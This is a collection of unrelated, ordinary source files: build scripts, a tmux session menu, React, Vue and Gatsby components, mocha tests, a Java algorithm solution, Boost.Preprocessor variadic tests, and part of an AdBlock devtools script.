.pipe(gulp.dest(`${src.jsDest}/vendor`));
});
gulp.task('manifest', () => {
return gulp.src(['./**/*.*'])
.pipe(manifest({
hash: true,
preferOnline: false,
network: ['*'],
filename: 'manifest.appcache',
exclude: [
'*.appcache',
'*.lock',
'**/*.json',
'**/_src/**/*.*',
'assets/icons/**/*.*',
'webpack.config.js',
'gulpfile.js',
'bower_components/**/*.*',
'node_modules/**/*.*',
]
}))
.pipe(gulp.dest('./'));
});
gulp.task('imagemin', () => {
return gulp.src('assets/img/**/*')
.pipe(imagemin())
.pipe(gulp.dest('assets/img'));
});
gulp.task('htmlmin', ['public'], () => {
return gulp.src('*.html')
.pipe(htmlmin())
.pipe(gulp.dest('./public'));
});
gulp.task('public', () => {
return gulp.src([
'**/.htaccess',
'*.png',
'*.ico',
'*.txt',
'*.appcache',
'assets/**/*.*',
'!assets/**/_src/*',
])
.pipe(gulp.dest('./public'));
});
// Generate the icon webfont from the SVG sources and render the matching
// CSS partial from the lodash template.
gulp.task('iconfont', () => {
    // Return the stream so gulp (3.x) can tell when font generation has
    // finished; the original dropped it, so the task was considered complete
    // immediately and dependents could run before the fonts existed.
    return gulp.src(src.iconsAll)
        .pipe(iconfont({
            fontName: 'icons',
            prependUnicode: false,
            formats: ['woff2', 'woff', 'svg'],
            normalize: true,
            centerHorizontally: true,
            fontHeight: 1000 // IMPORTANT
        }))
        .on('glyphs', (glyphs, options) => {
            // expose each glyph's first unicode codepoint as uppercase hex
            // for the CSS template
            glyphs = glyphs.map((glyph) => {
                glyph.codepoint = glyph.unicode[0].charCodeAt(0).toString(16).toUpperCase();
                return glyph;
            });
            gulp.src(src.iconsCss)
                .pipe(consolidate('lodash', Object.assign({}, options, {
                    timestamp: Math.round(+new Date()/1000),
                    param: true,
                    cssPrefix: 'icon-',
                    fontPath: '../fonts/',
                })))
                .pipe(rename('_icons.css'))
                .pipe(gulp.dest(src.iconsCssDest));
        })
        .pipe(gulp.dest(src.iconsDest));
});
gulp.task('default', ['dist', 'watch']);
gulp.task('dev', ['css', 'js', 'fallback', 'watch']);
gulp.task('dist', ['css', 'js', 'fallback', 'vendor'], () => {
return gulp.src('./')
.pipe(notify('dist done'));
});
/**
 * Generic stream error handler: log the failure through gulp-util and end
 * the stream so a watch run survives instead of crashing.
 */
function onError(err) {
    const { message } = err;
    gutil.log(message);
    this.emit('end');
}
|
#!/usr/bin/env bash

# Format string handed to `tmux list-sessions -F`; the #{...} placeholders
# are expanded by tmux, not by the shell.
session_choices_format() {
    local name="#{session_name}"
    local windows="#{session_windows} windows"
    local attached="#{?#{session_attached},#attached,}"
    echo "[ $name: $windows $attached ]"
}

# Build the peco menu: one "Attach" line and one "Kill" line per session,
# plus global "Kill server" / "Exit" entries.
session_choices() {
    local choices
    choices=$(tmux list-sessions -F "$(session_choices_format)" 2>/dev/null)
    echo "$choices" | while read -r line; do
        echo "Attach ==> $line"
    done
    echo "$choices" | while read -r line; do
        echo "Kill ==> $line"
    done
    echo "Kill server"
    echo "Exit"
}

# Show the menu through peco and execute the selected action.
session_control() {
    local selected
    selected=$(session_choices | peco)
    # Menu lines look like "Attach ==> [ name: N windows ... ]"; field 4 is
    # "name:" — strip the colon to recover the session name.
    local selected_id
    selected_id=$(echo "$selected" | awk '{print $4}' | sed "s/://g")
    case "$selected" in
        *Attach* ) tmux switch-client -t "$selected_id" ;;
        *Kill* )
            tmux kill-session -t "$selected_id"
            # Re-open the menu while any session remains. The original ran
            # `$(tmux has_session ...)` — "has_session" is not a tmux command
            # (it is `has-session`), so this always failed and the menu never
            # reappeared after killing a session; the command-substitution
            # trick for the exit status is also unnecessary.
            tmux has-session 2>/dev/null && session_control
            ;;
        "Kill server" ) tmux kill-server ;;
        "Exit" ) return ;;
    esac
}

session_control
|
<filename>src/components/layout.js
/**
* Layout component that queries for data
* with Gatsby's useStaticQuery component
*
* See: https://www.gatsbyjs.org/docs/use-static-query/
*/
import React from 'react';
import PropTypes from 'prop-types';
import Helmet from 'react-helmet';
import { useStaticQuery, graphql } from 'gatsby';
import Header from './Header';
import Footer from './Footer';
import './layout.css';
const Layout = ({ children }) => {
const data = useStaticQuery(graphql`
query SiteTitleQuery {
site {
siteMetadata {
title
description
keywords
}
}
allContentfulLink(sort: {fields: [createdAt], order: ASC }){
edges {
node {
title
url
createdAt
}
}
}
}
`);
return (
<div>
<Helmet
title={data.site.siteMetadata.title}
meta={[
{ name: 'description', content: data.site.siteMetadata.description },
{ name: 'keywords', content: data.site.siteMetadata.keywords },
]}
/>
<Header data={data} />
<main>{children}</main>
<Footer data={data}>
Backgrounds made in Cinema 4D,
iOS app in Swift, site in React.
<a href="mailto:<EMAIL>">Email us today</a>
{' '}
to ask anything.
</Footer>
{/* <footer >
©
{new Date().getFullYear()}
, Built with
{' '}
<a href="https://www.gatsbyjs.org">Gatsby</a>
</footer> */}
</div>
);
};
Layout.propTypes = {
children: PropTypes.node.isRequired,
};
export default Layout;
|
import { before } from 'mocha';
import { getArtblockInfo, getOpenseaInfo } from '../api_data';
var assert = require('assert');
const nock = require('nock');
process.env.NODE_ENV = 'test';
describe('ArtBlocks api_data', () => {
before(() => {
process.env.IS_PBAB = 'false';
process.env.PBAB_CONTRACT = '';
process.env.THUMBNAIL_LOCATION =
'https://artblocks-mainthumb.s3.amazonaws.com';
});
describe('#getArtblockInfo', () => {
before(() => {
if (!nock.isActive()) nock.activate();
const tokenScope = nock('https://token.artblocks.io')
.get('/1')
.reply(200, {
name: 'Recursion #1',
image: 'https://media.artblocks.io/1.png',
external_url: 'https://www.artblocks.io/token/1',
});
const imgScope = nock('https://artblocks-mainthumb.s3.amazonaws.com')
.get('/1.png')
.reply(200, {
data: new ArrayBuffer(8),
});
tokenScope;
imgScope;
});
afterEach(nock.cleanAll);
it('gets additional meta needed for alert', async () => {
const { name, image, external_url, imgBinary } = await getArtblockInfo(
'1'
);
assert.equal(name, 'Recursion #1');
assert.equal(image, 'https://media.artblocks.io/1.png');
assert.equal(external_url, 'https://www.artblocks.io/token/1');
const buffer = Buffer.isBuffer(imgBinary);
assert.equal(buffer, true);
});
});
describe('#getOpenseaInfo', () => {
const account = '0x104e1e2725dbbd2d75eb1a46e880932d2e1d4c12';
before(() => {
const openSeaScope = nock('https://api.opensea.io')
.get(`/account/${account}/`)
.reply(200, { data: { user: { username: 'ABKING123' } } });
openSeaScope;
});
it('gets owner data for alert', async () => {
const mintedBy = await getOpenseaInfo(account);
assert.equal(mintedBy, 'ABKING123');
});
});
});
describe('PBAB api_data', () => {
before(() => {
process.env.IS_PBAB = 'true';
process.env.PBAB_CONTRACT = '0x87c6e93fc0b149ec59ad595e2e187a4e1d7fdc25';
});
describe('#getArtblockInfo', () => {
before(() => {
if (!nock.isActive()) nock.activate();
const tokenScope = nock('https://token.artblocks.io')
.get('/0x87c6e93fc0b149ec59ad595e2e187a4e1d7fdc25/1')
.reply(200, {
name: 'Recursion #1',
image: 'https://media.artblocks.io/1.png',
external_url: 'https://www.artblocks.io/token/1',
});
const imgScope = nock('https://media.artblocks.io')
.get('/1.png')
.reply(200, {
data: new ArrayBuffer(8),
});
tokenScope;
imgScope;
});
afterEach(nock.cleanAll);
it('gets additional meta needed for alert', async () => {
const { name, image, external_url, imgBinary } = await getArtblockInfo(
'1'
);
assert.equal(name, 'Recursion #1');
assert.equal(image, 'https://media.artblocks.io/1.png');
assert.equal(external_url, 'https://www.artblocks.io/token/1');
const buffer = Buffer.isBuffer(imgBinary);
assert.equal(buffer, true);
});
});
describe('#getOpenseaInfo', () => {
const account = '0x104e1e2725dbbd2d75eb1a46e880932d2e1d4c12';
before(() => {
const openSeaScope = nock('https://api.opensea.io')
.get(`/account/${account}/`)
.reply(200, { data: { user: { username: 'ABKING123' } } });
openSeaScope;
});
it('gets owner data for alert', async () => {
const mintedBy = await getOpenseaInfo(account);
assert.equal(mintedBy, 'ABKING123');
});
});
});
|
package greedy;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.StringTokenizer;
/**
*
* @author exponential-e
* 백준 20117번: 호반우의 이상한 품질 계산법
*
* @see https://www.acmicpc.net/problem/20117
*
*/
public class Boj20117 {

    // Reads N and N integers from stdin, prints the maximal quality value.
    public static void main(String[] args) throws Exception{
        BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
        int N = Integer.parseInt(br.readLine());
        int[] hobanwoo = new int[N];
        StringTokenizer st = new StringTokenizer(br.readLine());
        for(int i = 0; i < N; i++) {
            hobanwoo[i] = Integer.parseInt(st.nextToken());
        }
        System.out.println(maxCost(hobanwoo));
    }

    // After sorting ascending, every element in the upper half counts twice
    // (each paired with a smaller partner); with an odd count the single
    // middle element is added once at the end.
    private static int maxCost(int[] arr) {
        int value = 0;
        Arrays.sort(arr);
        int div = arr.length / 2;
        // first index of the doubled upper half: skip the middle element
        // when the length is odd
        int half = arr.length % 2 == 1 ? div + 1: div;
        for(int i = arr.length - 1; i >= half; i--) { // tied with the smallest & largest
            value += arr[i] * 2;
        }
        return value + (arr.length % 2 == 1 ? arr[div]: 0);
    }
}
|
#!/bin/sh -e
scripts_home=/root/scripts/initial-setup.d
install -v -o 0 -g 0 -m 755 -p "files/9899-edit-cmdline.sh" "${ROOTFS_DIR}/${scripts_home}/"
|
start
external_tools
finish
|
<reponame>yannzido/new
import { ActionTree, GetterTree, Module, MutationTree } from 'vuex';
import { RootState } from '../types';
export interface KeysState {
expandedTokens: string[];
}
export const tokensState: KeysState = {
expandedTokens: [],
};
export const getters: GetterTree<KeysState, RootState> = {
    // Curried getter: `tokenExpanded(id)` reports whether the token with
    // that id is currently in the expanded list.
    tokenExpanded: (state) => (id: string) => {
        return state.expandedTokens.includes(id);
    },
};
export const mutations: MutationTree<KeysState> = {
    /** Collapse the token: drop `id` from the expanded list if present. */
    setTokenHidden(state, id: string) {
        const position = state.expandedTokens.indexOf(id);
        if (position !== -1) {
            state.expandedTokens.splice(position, 1);
        }
    },
    /** Expand the token: record `id` unless it is already tracked. */
    setTokenExpanded(state, id: string) {
        if (!state.expandedTokens.includes(id)) {
            state.expandedTokens.push(id);
        }
    },
};
export const actions: ActionTree<KeysState, RootState> = {
    /** Mark the token with `id` as expanded. */
    expandToken({ commit }, id: string) {
        commit('setTokenExpanded', id);
    },
    /** Mark the token with `id` as hidden (collapsed). */
    hideToken({ commit }, id: string) {
        commit('setTokenHidden', id);
    },
};
export const keysModule: Module<KeysState, RootState> = {
namespaced: false,
state: tokensState,
getters,
actions,
mutations,
};
|
<gh_stars>0
var EllaExchangeService = artifacts.require("./EllaExchangeService.sol");
module.exports = async (deployer) => {
await deployer.deploy(
EllaExchangeService,
"0x",
"0x",
true,
"0x",
"0x"
);
};
|
<reponame>andreapatri/cms_journal<filename>node_modules/@buffetjs/hooks/src/useIsMounted/index.js<gh_stars>0
import { useRef, useEffect } from 'react';
// Hook taken from https://github.com/hupe1980/react-is-mounted-hook
function useIsMounted() {
  // true from the first render until the component unmounts
  const ref = useRef(true);
  useEffect(() => {
    ref.current = true;
    return () => {
      // effect cleanup runs on unmount, flipping the flag
      ref.current = false;
    };
  }, []);
  // NOTE: returns the snapshot of ref.current taken at render time, not the
  // ref object itself — callers see the value as of their last render.
  return ref.current;
}
export default useIsMounted;
|
#!/bin/bash
# build src
rm -rf out/src
mkdir -p out/src
./node_modules/.bin/babel --out-dir out/src src
# build test
rm -rf out/test/src
mkdir -p out/test/src
./node_modules/.bin/babel --out-dir out/test/src test/src
|
import React from 'react';
import { View, StyleSheet, TextInput } from 'react-native';
import { API } from './api';
export default class App extends React.Component {
  // `query` mirrors the search input; `results` holds the hits returned by
  // the API for that query.
  state = {
    query: '',
    results: []
  };

  // Fetch search hits for the current query.
  // NOTE(review): API_KEY is referenced but neither defined nor imported in
  // this file — confirm it is provided globally (e.g. injected by the bundler).
  fetchData = async () => {
    const response = await API.get(
      // encodeURIComponent keeps spaces, '&', '#' etc. in the typed query
      // from corrupting the request URL (the raw interpolation did not)
      `/search?q=${encodeURIComponent(this.state.query)}&api_key=${API_KEY}`
    );
    this.setState({ results: response.data.hits });
  };

  // Update state with the new input value, then re-query inside the setState
  // callback so fetchData reads the committed query.
  handleChange = query => {
    this.setState({ query }, () => this.fetchData());
  };

  render() {
    // render components
  }
}
const styles = StyleSheet.create({
// style declarations
}); |
<filename>client/src/components/Order/OrderDetail.js
import React from "react";
import "./Order";
class OrderDetail extends React.Component {
state = {
tax: 0,
total: 0,
};
componentDidMount = () => {
console.log(this.props.cart);
const order = this.props.cart.reduce(
(acc, item) => {
console.log({ item });
item = item.price.substr(1);
item = Number(item);
acc.total += item;
return acc;
},
{ total: 0 }
);
order.tax = order.total >= 0 ? order.total * 0.06 : 0;
this.setState({ tax: order.tax, total: order.total });
};
handleOrderDetails = () => {
return (
<div class="row">
<div class="col m12 m6">
<div class="card blue-grey darken-1">
<div class="card-content white-text">
<label className="tax">Tax</label>
<h3>{this.state.tax}</h3>
<label className="total">total</label>
<h2>{this.state.total}</h2>
<button name="btns">submit</button>
</div>
</div>
</div>
</div>
);
};
render() {
return (
<>
<div>{this.handleOrderDetails()}</div>
</>
);
}
}
export default OrderDetail;
|
#!/usr/bin/env bash
set -euo pipefail
make bundle
npx openapi-to-postmanv2 --pretty --spec dist/Lob-API-public-bundled.yml --output dist/Lob-API-postman.txt
|
<reponame>darwinbeing/deepdriving-tensorflow<gh_stars>1-10
from .wrapper import CDriveController |
import Input from './Input';
import './index.less';
export * from './Input';
export default Input;
|
<reponame>vany152/FilesHash
# /* **************************************************************************
# * *
# * (C) Copyright <NAME> 2011.
# * Distributed under the Boost Software License, Version 1.0. (See
# * accompanying file LICENSE_1_0.txt or copy at
# * http://www.boost.org/LICENSE_1_0.txt)
# * *
# ************************************************************************** */
#
# /* See http://www.boost.org for most recent version. */
#
# include <boost/preprocessor/config/limits.hpp>
# include <boost/preprocessor/variadic.hpp>
# include <boost/preprocessor/array/size.hpp>
# include <boost/preprocessor/array/elem.hpp>
# include <boost/preprocessor/list/at.hpp>
# include <boost/preprocessor/list/size.hpp>
# include <boost/preprocessor/seq/elem.hpp>
# include <boost/preprocessor/seq/size.hpp>
# include <boost/preprocessor/tuple/size.hpp>
# include <boost/preprocessor/tuple/elem.hpp>
# include <libs/preprocessor/test/test.h>
#define VDATA 0,1,2,3,4,5,6
#define VDATA_LARGE 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32
#define VDATA_VERY_LARGE 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63
#if BOOST_PP_VARIADIC_HAS_OPT()
#define VDATA_EMPTY
#endif
#if BOOST_PP_LIMIT_VARIADIC > 64
#define VDATA_LARGE_128 \
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, \
64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95
#define VDATA_VERY_LARGE_128 \
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, \
64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127
#endif
#if BOOST_PP_LIMIT_VARIADIC > 128
#define VDATA_LARGE_256 \
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, \
64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, \
128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138
#define VDATA_VERY_LARGE_256 \
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, \
64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, \
128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, \
192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255
#endif
/* Zero-based element access into variadic data (VDATA* macros are defined
   elsewhere in this test file). */
BEGIN BOOST_PP_VARIADIC_ELEM(4,VDATA) == 4 END
BEGIN BOOST_PP_VARIADIC_ELEM(6,7,11,3,8,14,85,56,92,165) == 56 END
BEGIN BOOST_PP_VARIADIC_ELEM(29,VDATA_LARGE) == 29 END
BEGIN BOOST_PP_VARIADIC_ELEM(57,VDATA_VERY_LARGE) == 57 END
BEGIN BOOST_PP_VARIADIC_ELEM(35, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63) == 35 END
/* Counting variadic arguments. */
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA) == 7 END
BEGIN BOOST_PP_VARIADIC_SIZE(7,11,3,8,14,85,56,92,165) == 9 END
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_LARGE) == 33 END
BEGIN BOOST_PP_VARIADIC_SIZE(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32) == 33 END
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_VERY_LARGE) == 64 END
/* With __VA_OPT__ support the empty argument list has size 0 (without it,
   an empty pack still counts as one argument). */
#if BOOST_PP_VARIADIC_HAS_OPT()
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_EMPTY) == 0 END
BEGIN BOOST_PP_VARIADIC_SIZE() == 0 END
#endif
/* Conversions from variadic data to the other Boost.PP data structures
   (array, list, seq, tuple), checked via each structure's size/element
   accessors. */
BEGIN BOOST_PP_ARRAY_SIZE(BOOST_PP_VARIADIC_TO_ARRAY(VDATA)) == 7 END
BEGIN BOOST_PP_ARRAY_SIZE(BOOST_PP_VARIADIC_TO_ARRAY(VDATA_VERY_LARGE)) == 64 END
BEGIN BOOST_PP_ARRAY_ELEM(4,BOOST_PP_VARIADIC_TO_ARRAY(7,11,3,8,14,85,56,92,165)) == 14 END
BEGIN BOOST_PP_ARRAY_ELEM(30,BOOST_PP_VARIADIC_TO_ARRAY(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32)) == 30 END
BEGIN BOOST_PP_LIST_AT(BOOST_PP_VARIADIC_TO_LIST(VDATA),3) == 3 END
BEGIN BOOST_PP_LIST_AT(BOOST_PP_VARIADIC_TO_LIST(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63),49) == 49 END
BEGIN BOOST_PP_LIST_SIZE(BOOST_PP_VARIADIC_TO_LIST(7,11,3,8,14,85,56,92,165)) == 9 END
BEGIN BOOST_PP_LIST_SIZE(BOOST_PP_VARIADIC_TO_LIST(VDATA_LARGE)) == 33 END
BEGIN BOOST_PP_SEQ_ELEM(5,BOOST_PP_VARIADIC_TO_SEQ(VDATA)) == 5 END
BEGIN BOOST_PP_SEQ_ELEM(16,BOOST_PP_VARIADIC_TO_SEQ(VDATA_LARGE)) == 16 END
BEGIN BOOST_PP_SEQ_SIZE(BOOST_PP_VARIADIC_TO_SEQ(3,78,22,11,3)) == 5 END
BEGIN BOOST_PP_SEQ_SIZE(BOOST_PP_VARIADIC_TO_SEQ(VDATA_VERY_LARGE)) == 64 END
BEGIN BOOST_PP_TUPLE_SIZE(BOOST_PP_VARIADIC_TO_TUPLE(VDATA)) == 7 END
BEGIN BOOST_PP_TUPLE_SIZE(BOOST_PP_VARIADIC_TO_TUPLE(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63)) == 64 END
BEGIN BOOST_PP_TUPLE_ELEM(8,BOOST_PP_VARIADIC_TO_TUPLE(7,11,3,8,14,85,56,92,165)) == 165 END
BEGIN BOOST_PP_TUPLE_ELEM(27,BOOST_PP_VARIADIC_TO_TUPLE(VDATA_LARGE)) == 27 END
/* Same checks for data exceeding 64 elements, available only when the
   library limits have been raised. */
#if BOOST_PP_LIMIT_VARIADIC > 64
BEGIN BOOST_PP_VARIADIC_ELEM(47,VDATA_LARGE_128) == 47 END
BEGIN BOOST_PP_VARIADIC_ELEM(81,VDATA_LARGE_128) == 81 END
BEGIN BOOST_PP_VARIADIC_ELEM(29,VDATA_VERY_LARGE_128) == 29 END
BEGIN BOOST_PP_VARIADIC_ELEM(112,VDATA_VERY_LARGE_128) == 112 END
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_LARGE_128) == 96 END
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_VERY_LARGE_128) == 128 END
/* Array/tuple conversions additionally need the tuple limit raised. */
#if BOOST_PP_LIMIT_TUPLE > 64
BEGIN BOOST_PP_ARRAY_SIZE(BOOST_PP_VARIADIC_TO_ARRAY(VDATA_LARGE_128)) == 96 END
BEGIN BOOST_PP_ARRAY_SIZE(BOOST_PP_VARIADIC_TO_ARRAY(VDATA_VERY_LARGE_128)) == 128 END
BEGIN BOOST_PP_ARRAY_ELEM(83,BOOST_PP_VARIADIC_TO_ARRAY(VDATA_LARGE_128)) == 83 END
BEGIN BOOST_PP_ARRAY_ELEM(117,BOOST_PP_VARIADIC_TO_ARRAY(VDATA_VERY_LARGE_128)) == 117 END
#endif
BEGIN BOOST_PP_LIST_AT(BOOST_PP_VARIADIC_TO_LIST(VDATA_LARGE_128),79) == 79 END
BEGIN BOOST_PP_LIST_SIZE(BOOST_PP_VARIADIC_TO_LIST(VDATA_VERY_LARGE_128)) == 128 END
BEGIN BOOST_PP_SEQ_ELEM(113,BOOST_PP_VARIADIC_TO_SEQ(VDATA_VERY_LARGE_128)) == 113 END
BEGIN BOOST_PP_SEQ_ELEM(82,BOOST_PP_VARIADIC_TO_SEQ(VDATA_LARGE_128)) == 82 END
BEGIN BOOST_PP_SEQ_SIZE(BOOST_PP_VARIADIC_TO_SEQ(VDATA_LARGE_128)) == 96 END
#if BOOST_PP_LIMIT_TUPLE > 64
BEGIN BOOST_PP_TUPLE_SIZE(BOOST_PP_VARIADIC_TO_TUPLE(VDATA_VERY_LARGE_128)) == 128 END
BEGIN BOOST_PP_TUPLE_ELEM(77,BOOST_PP_VARIADIC_TO_TUPLE(VDATA_LARGE_128)) == 77 END
#endif
#endif
/* And once more for data exceeding 128 elements. */
#if BOOST_PP_LIMIT_VARIADIC > 128
BEGIN BOOST_PP_VARIADIC_ELEM(47,VDATA_LARGE_256) == 47 END
BEGIN BOOST_PP_VARIADIC_ELEM(110,VDATA_LARGE_256) == 110 END
BEGIN BOOST_PP_VARIADIC_ELEM(135,VDATA_LARGE_256) == 135 END
BEGIN BOOST_PP_VARIADIC_ELEM(36,VDATA_VERY_LARGE_256) == 36 END
BEGIN BOOST_PP_VARIADIC_ELEM(95,VDATA_VERY_LARGE_256) == 95 END
BEGIN BOOST_PP_VARIADIC_ELEM(161,VDATA_VERY_LARGE_256) == 161 END
BEGIN BOOST_PP_VARIADIC_ELEM(217,VDATA_VERY_LARGE_256) == 217 END
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_LARGE_256) == 139 END
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_VERY_LARGE_256) == 256 END
#if BOOST_PP_LIMIT_TUPLE > 128
BEGIN BOOST_PP_ARRAY_SIZE(BOOST_PP_VARIADIC_TO_ARRAY(VDATA_LARGE_256)) == 139 END
BEGIN BOOST_PP_ARRAY_SIZE(BOOST_PP_VARIADIC_TO_ARRAY(VDATA_VERY_LARGE_256)) == 256 END
BEGIN BOOST_PP_ARRAY_ELEM(133,BOOST_PP_VARIADIC_TO_ARRAY(VDATA_LARGE_256)) == 133 END
BEGIN BOOST_PP_ARRAY_ELEM(203,BOOST_PP_VARIADIC_TO_ARRAY(VDATA_VERY_LARGE_256)) == 203 END
#endif
BEGIN BOOST_PP_LIST_AT(BOOST_PP_VARIADIC_TO_LIST(VDATA_LARGE_256),137) == 137 END
BEGIN BOOST_PP_LIST_SIZE(BOOST_PP_VARIADIC_TO_LIST(VDATA_VERY_LARGE_256)) == 256 END
BEGIN BOOST_PP_SEQ_ELEM(212,BOOST_PP_VARIADIC_TO_SEQ(VDATA_VERY_LARGE_256)) == 212 END
BEGIN BOOST_PP_SEQ_ELEM(129,BOOST_PP_VARIADIC_TO_SEQ(VDATA_LARGE_256)) == 129 END
BEGIN BOOST_PP_SEQ_SIZE(BOOST_PP_VARIADIC_TO_SEQ(VDATA_LARGE_256)) == 139 END
#if BOOST_PP_LIMIT_TUPLE > 128
BEGIN BOOST_PP_TUPLE_SIZE(BOOST_PP_VARIADIC_TO_TUPLE(VDATA_VERY_LARGE_256)) == 256 END
BEGIN BOOST_PP_TUPLE_ELEM(133,BOOST_PP_VARIADIC_TO_TUPLE(VDATA_LARGE_256)) == 133 END
#endif
#endif
|
<reponame>1Guardian/Opal-Browser<filename>gighmmpiobklfepjocnamgkkbiglidom/devtools.js
// This file is based on this similar ABP file:
// https://github.com/adblockplus/adblockpluschrome/blob/master/devtools.js
"use strict";

// The devtools-panel window, when the AdBlock panel is currently shown.
let panelWindow = null;

(async () =>
{
  // Versions of Firefox before 54 do not support the devtools.panels API; on
  // these platforms, even when the option is enabled, we cannot show the
  // devtools panel.
  if (!("panels" in browser.devtools))
    return;

  // Ask the background page whether the user enabled the devtools panel.
  const enabled = await browser.runtime.sendMessage(
    {
      type: "prefs.get",
      key: "show_devtools_panel"
    });
  if (!enabled)
    return;

  const panel = await browser.devtools.panels.create(
    "AdBlock",
    "icons/ab-32.png",
    "devtools-panel.html");

  // Track the panel window so search events can be forwarded to it.
  panel.onShown.addListener(window =>
  {
    panelWindow = window;
  });
  panel.onHidden.addListener(() =>
  {
    panelWindow = null;
  });

  // onSearch is not available on every platform; forward devtools search
  // events into the panel when it is.
  if (panel.onSearch)
  {
